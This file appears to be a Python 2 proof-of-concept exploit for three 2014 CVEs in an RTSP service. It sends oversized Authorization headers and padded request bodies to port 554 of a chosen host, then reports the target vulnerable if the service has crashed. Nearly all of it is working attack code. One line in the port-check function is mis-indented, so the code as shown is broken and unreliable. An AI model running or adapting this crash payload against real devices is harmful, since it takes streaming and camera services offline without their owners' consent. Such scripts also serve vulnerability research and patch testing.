#!/usr/bin/env python
# coding: utf-8
import sys
import socket
from time import sleep

def cve20144878_poc(host):
    payload = 'PLAY rtsp://%s/ RTSP/1.0\r\n' % host
    payload += 'CSeq: 7\r\n'
    payload += 'Authorization: Basic AAAAAAA\r\n'
    payload += 'Content-length: 3200\r\n\r\n'
    payload += 'A' * 3200
    return payload

def cve20144879_poc(host):
    payload = 'PLAY rtsp://%s/ RTSP/1.0\r\n' % host
    payload += 'Authorization'
    payload += 'A' * 1024
    payload += ': Basic AAAAAAA\r\n\r\n'
    return payload

def cve20144880_poc(host):
    payload = 'PLAY rtsp://%s/ RTSP/1.0\r\n' % host
    payload += 'CSeq: 7\r\n'
    payload += 'Authorization: Basic '
    payload += 'A' * 2048
    payload += '\r\n\r\n'
    payload += 'B' * 1024
    return payload

def check_port_on(host):
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    check_target = (host, 554)

port_status = soc.connect_ex(check_target)
    if port_status == 0:
        return True
    else:
        return False

def check_vuln_exists(host, poc):
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        soc.connect((host, 554))
    except socket.error:
        return False

    if poc == '1':
        payload = cve20144878_poc(host)
    elif poc == '2':
        payload = cve20144879_poc(host)
    else:
        payload = cve20144880_poc(host)

    soc.send(payload)
    soc.close()

    sleep(1)  # sleep to wait server crash
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        soc.connect((host, 554))
    except socket.error:
        return True

    return False

if __name__ == '__main__':
    if sys.argv.__len__() < 3:
        print '\nUsage: %s <HOST> <POCn>' % sys.argv[0]
        print '\n[-] POC choose'
        print '\t1 ==> CVE-2014-4878'
        print '\t2 ==> CVE-2014-4879'
        print '\t3 ==> CVE-2014-4880'
        sys.exit()

    target = sys.argv[1]
    poc_number = sys.argv[2]
    if poc_number not in '123':
        print 'Choose one POC.'
        sys.exit()

    if check_port_on(target):
        vuln_exists = check_vuln_exists(target, poc_number)
        if vuln_exists:
            print 'Target is vulnerable.'
        else:
            print 'Target may not be vulnerable.'
    else:
        print 'RTSP(port 554) closed'